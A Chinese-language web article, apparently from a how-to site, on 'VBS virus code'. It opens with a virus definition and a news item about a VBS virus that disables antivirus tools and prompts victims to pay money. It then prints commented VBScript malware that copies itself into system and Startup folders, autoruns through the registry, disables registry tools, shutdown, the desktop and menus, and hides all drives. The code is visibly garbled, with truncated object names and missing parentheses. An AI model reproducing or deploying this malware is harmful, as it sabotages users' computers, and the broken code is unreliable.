vbs的電腦病毒代碼是怎樣的
計(jì)算機(jī)病毒,是指編制或者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者毀壞數(shù)據(jù),影響計(jì)算機(jī)使用,并能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼。這是目前官方最權(quán)威的關(guān)于計(jì)算機(jī)病毒的定義,此定義也被通行的《計(jì)算機(jī)病毒防治產(chǎn)品評(píng)級(jí)準(zhǔn)則》的國家標(biāo)準(zhǔn)所采納。以下是學(xué)習(xí)啦網(wǎng)小編為大家整理的關(guān)于vbs電腦病毒代碼的相關(guān)知識(shí),希望對(duì)大家有所幫助!
上海計(jì)算機(jī)病毒防范服務(wù)中心提醒,本周需防范一種在網(wǎng)上流行的“VBS病毒”(Virus.VBS.d),該病毒不但導(dǎo)致多種殺毒軟件不能運(yùn)行,而且還會(huì)彈出“解毒號(hào)碼”等欺詐信息,要求被害用戶向指定賬戶匯款,反病毒專家提醒用戶不要被這種欺詐信息迷惑。
據(jù)介紹,這種病毒可以導(dǎo)致多種殺毒軟件或工具不能正常運(yùn)行。更值得注意的是,當(dāng)病毒感染的文件數(shù)超過2000個(gè),會(huì)彈出對(duì)話框提示信息,提示內(nèi)容為:“您已有超過2000個(gè)文件被感染!不過請(qǐng)放心,此病毒很容易被清除!請(qǐng)聯(lián)系418465***!”反病毒專家分析,這個(gè)號(hào)碼是QQ號(hào),受害用戶一旦加入這個(gè)號(hào)碼,會(huì)被要求向指定賬戶匯款。專家提醒這通常是欺詐行為,受害用戶要以正常方式殺毒,不要輕信這種欺詐信息。
專家建議,平時(shí)用戶上網(wǎng)時(shí)要開啟防病毒軟件的實(shí)時(shí)監(jiān)控功能,并關(guān)閉U盤的“自動(dòng)播放功能”。用戶可針對(duì)自己計(jì)算機(jī)安裝的操作系統(tǒng),找到相應(yīng)的安全漏洞補(bǔ)丁,下載并安裝。以遏制利用這些漏洞進(jìn)行傳播的病毒,減少病毒給計(jì)算機(jī)用戶帶來的危害。
on error resume next
set fs=createobject("ing.filesystemobject" '創(chuàng)建一個(gè)能與操作系統(tǒng)溝通的對(duì)象,再利用該對(duì)象的各種方法對(duì)注冊表進(jìn)行操作
set dir1=fs.getspecialfolder(0) '獲取windows/winnt文件夾位置
set dir2=fs.getspecialfolder(1) '獲取system32/system文件夾位置
set so=createobject("ing.filesystemobject"
dim r '定義一個(gè)變量
set r=createobject("w.shell"
so.getfile(w.fullname).copy(dir1&"\win32system.vbs" '復(fù)制病毒副本到windows/winnt文件夾位置
so.getfile(w.fullname).copy(dir2&"\win32system.vbs" '復(fù)制病毒副本到system32/system文件夾位置
so.getfile(w.fullname).copy(dir1&"\start menu\programs\啟動(dòng)\win32system.vbs" '復(fù)制病毒副本到start menu啟動(dòng)菜單
'下面是對(duì)注冊表的惡意修改和簡單的依靠oe傳播
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注冊表,禁止“運(yùn)行”菜單
r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注冊表,禁止“關(guān)閉”菜單
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注冊表,隱藏所有邏輯盤符
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注冊表,禁止注冊表編輯
r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注冊表,禁止開機(jī)注冊表掃描
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注冊表,禁止“注銷”菜單
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注冊表,禁止ms-dos實(shí)模式
r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注冊表,使這個(gè)腳本本身開機(jī)自動(dòng)運(yùn)行
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注冊表,禁止顯示桌面圖標(biāo)
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注冊表,禁止純dos模式
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注冊表,禁止“任務(wù)欄和開始”菜單
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注冊表,禁止右鍵菜單